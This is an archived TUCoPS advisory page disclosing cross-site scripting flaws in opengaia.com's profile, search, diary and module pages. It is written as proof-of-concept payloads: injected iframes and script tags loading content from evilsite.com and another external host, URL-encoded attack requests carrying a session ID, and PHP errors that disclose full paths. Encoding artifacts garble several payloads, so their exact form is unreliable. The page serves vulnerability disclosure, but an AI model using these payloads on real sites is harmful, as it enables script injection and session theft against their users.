TUCoPS :: Web :: Specific Sites

TUCoPS :: Web :: Specific Sites :: b06-2914.htm
Opengaia.com - XSS Vuln & Session Include
Opengaia.com - XSS Vuln & Session Include Opengaia.com - XSS Vuln & Session Include

Opengaia.com=0D
=0D
Homepage:=0D
http://www.opengaia.com=0D 
=0D
Effected files:=0D
my_page.php=0D
module.php=0D
editing your profile=0D
the search input box=0D
adding a diary/blog=0D
=0D
------------------------------------=0D
=0D
Just like in onlinenode.com's vulnerabilities, it seems this site filters data just about the same. Below is one way to create a XSS vuln by closing quotes and using an open ended iframe.=0D
=0D
'>'>
&langue=en&PHPSESSID=538f9354d24325a0bf3b293ddb469274=0D">http://www.opengaia.com/my_page.php?viewed_id=6871">'>'>
&langue=en&PHPSESSID=538f9354d24325a0bf3b293ddb469274=0D 
=0D
 tags also workin each .php file. Example:=0D
=0D
<'<"">=0D">http://www.opengaia.com/my_page.php?viewed_id=6871''"<"'><'<"">=0D 
=0D
=0D
Module.php XSS Vuln:=0D
=0D
It seems with this code, we'll get a php error with full path disclosure and the xss won't work:=0D
=0D
http://www.opengaia.com/modele.php?connection=1&name=%27%27%22%3C%22%27%3E%3Ciframe%2520src%3Dhttp%3A%2F%2Fevilsite.com%2Fscriptlet.html%2520%3C%5C=0D 
=0D
Warning: main(./): failed to open stream: Success in /home/user/public_html/modele.php on line 243=0D
=0D
Warning: main(./): failed to open stream: Permission denied in /home/user/public_html/modele.php on line 243=0D
=0D
Warning: main(): Failed opening './' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/encoree/public_html/modele.php on line 243=0D
=0D
Warning: main(./): failed to open stream: Permission denied in /home/user/public_html/modele.php on line 247=0D
=0D
Warning: main(./): failed to open stream: Permission denied in /home/user/public_html/modele.php on line 247=0D
=0D
Warning: main(): Failed opening './' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/user/=0D
=0D
public_html/modele.php on line 247=0D
=0D
modele.php XSS Vuln using iframe tag:=0D
=0D
http://www.opengaia.com/modele.php?connection=1&name=%22%3E%27%3E%3Ciframe+src%3Dhttp%3A%2F%2Fwww.google.com%3E%3C%22&password=&object_menu=&right=accueil.php&left=bienvenue.php&page=home&viewed_id=&fond=cccccc&langue=en&object_type=&filtre==0D 
=0D
-------------------------------------=0D
=0D
Editing your profile XSS with PHP Session included:=0D
=0D
It seems the input boxes of editing your profile don't properlly filter user input before generating it. For a PoC example =0D
=0D
we will use end tags and put <"<"">=0D">SRC=http://www.youfucktard.com/xss.js><"<"">=0D 
=0D
Screenshots of PoC in action:=0D
=0D
http://www.youfucktard.com/xsp/gaia2.jpg=0D 
http://www.youfucktard.com/xsp/gaia3.jpg=0D 
http://www.youfucktard.com/xsp/gaia3.jpg=0D 
=0D
-----------------------------------=0D
=0D
Search input box XSS Vuln PoC:=0D
=0D
in the search boxtry putting:=0D
src=http://www.evilsite.com/scriptlet.html</a> <=0D 
=0D
---------------------------------=0D
=0D
Data isn't properly filtered when adding a diary/blog as well. for PoC try putting:=0D
=0D
<iframe <a href="http://evilsite.com/scriptlet.html">src=http://evilsite.com/scriptlet.html</a> <=0D 

</b></font></pre></tt></body></html>


<!-- google_ad_section_end -->
<p><center>

<p></center>
<center><a href="/firefox.htm">TUCoPS is optimized to look best in Firefox&reg; on a widescreen monitor (1440x900 or better).</a></center>
<font size=1><center>Site design & layout copyright &copy; 1986-2024 AOH</font>
</center>
<br><center><IMG SRC="http://artofhacking.com/cgi-bin/sc/sc.cgi?acct=tucops&font=payphone-med"></center>
<p>
</body>
</html>